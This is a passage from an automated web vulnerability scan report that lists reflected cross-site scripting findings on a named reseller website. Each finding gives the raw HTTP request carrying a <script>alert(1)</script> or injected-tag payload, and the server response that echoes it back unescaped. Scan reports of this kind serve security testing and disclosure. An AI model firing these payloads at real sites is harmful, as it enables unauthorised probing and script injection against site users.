This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmosae5cd<script>alert(1)</script>c8ed0be7cff/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmosae5cd<script>alert(1)</script>c8ed0be7cff/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2887. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4523e<script>alert(1)</script>f4b38ed54fc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/search.php4523e<script>alert(1)</script>f4b38ed54fc?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/search.php4523e<script>alert(1)</script>f4b38ed54fc?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2888. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 55095<a>6760fdb4647 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search55095<a>6760fdb4647&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search55095<a>6760fdb4647&opt=2 was not found on this server.</p>
...[SNIP]...

2.2889. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1f3f7<a>67aac2ab8e2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/search.php?keyword=search...1f3f7<a>67aac2ab8e2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/search.php?keyword=search...1f3f7<a>67aac2ab8e2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2890. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload db9b5<script>alert(1)</script>f12f06b1ff1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&db9b5<script>alert(1)</script>f12f06b1ff1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&db9b5<script>alert(1)</script>f12f06b1ff1=1 was not found on this server.</p>
...[SNIP]...

2.2891. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4cc0a<a>1546d1c675a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=24cc0a<a>1546d1c675a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=24cc0a<a>1546d1c675a was not found on this server.</p>
...[SNIP]...

2.2892. http://www.resellerbase.com/detail/40/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a094<script>alert(1)</script>1a02443b70f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8a094<script>alert(1)</script>1a02443b70f/40/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8a094<script>alert(1)</script>1a02443b70f/40/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2893. http://www.resellerbase.com/detail/40/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4baaf<script>alert(1)</script>7bdc0327ad7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/404baaf<script>alert(1)</script>7bdc0327ad7/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/404baaf<script>alert(1)</script>7bdc0327ad7/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2894. http://www.resellerbase.com/detail/40/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27f61<script>alert(1)</script>a6d7761031f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes27f61<script>alert(1)</script>a6d7761031f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes27f61<script>alert(1)</script>a6d7761031f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2895. http://www.resellerbase.com/detail/40/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57437<script>alert(1)</script>cca2c0d5930 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/search.php57437<script>alert(1)</script>cca2c0d5930?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/search.php57437<script>alert(1)</script>cca2c0d5930?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2896. http://www.resellerbase.com/detail/40/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d6bfd<a>e169058184b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/search.php?keyword=search...&Submit3=Searchd6bfd<a>e169058184b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/search.php?keyword=search...&Submit3=Searchd6bfd<a>e169058184b&opt=2 was not found on this server.</p>
...[SNIP]...

2.2897. http://www.resellerbase.com/detail/40/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 4ac9f<a>14c8cdaae76 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/search.php?keyword=search...4ac9f<a>14c8cdaae76&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/search.php?keyword=search...4ac9f<a>14c8cdaae76&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2898. http://www.resellerbase.com/detail/40/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4feb6<script>alert(1)</script>5aca5939ce9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/search.php?keyword=search...&Submit3=Search&opt=2&4feb6<script>alert(1)</script>5aca5939ce9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/search.php?keyword=search...&Submit3=Search&opt=2&4feb6<script>alert(1)</script>5aca5939ce9=1 was not found on this server.</p>
...[SNIP]...

2.2899. http://www.resellerbase.com/detail/40/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7b347<a>cb580786a3f was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/search.php?keyword=search...&Submit3=Search&opt=27b347<a>cb580786a3f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/search.php?keyword=search...&Submit3=Search&opt=27b347<a>cb580786a3f was not found on this server.</p>
...[SNIP]...

2.2900. http://www.resellerbase.com/detail/40/videosecrets-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/videosecrets-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5241<script>alert(1)</script>0606e461cd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc5241<script>alert(1)</script>0606e461cd8/40/videosecrets-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc5241<script>alert(1)</script>0606e461cd8/40/videosecrets-com.html was not found on this server.</p>
...[SNIP]...

2.2901. http://www.resellerbase.com/detail/40/videosecrets-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/videosecrets-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6559f<a>10475398335 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/406559f<a>10475398335/videosecrets-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/406559f<a>10475398335/videosecrets-com.html was not found on this server.</p>
...[SNIP]...

2.2902. http://www.resellerbase.com/detail/40/videosecrets-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/videosecrets-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4ea97<script>alert(1)</script>cf8530c3ae7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/4ea97<script>alert(1)</script>cf8530c3ae7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/4ea97<script>alert(1)</script>cf8530c3ae7 was not found on this server.</p>
...[SNIP]...

2.2903. http://www.resellerbase.com/detail/41/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8daf6<script>alert(1)</script>5d831ede408 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8daf6<script>alert(1)</script>5d831ede408/41/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8daf6<script>alert(1)</script>5d831ede408/41/ was not found on this server.</p>
...[SNIP]...

2.2904. http://www.resellerbase.com/detail/41/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 50b52<script>alert(1)</script>fc0263d503a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4150b52<script>alert(1)</script>fc0263d503a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
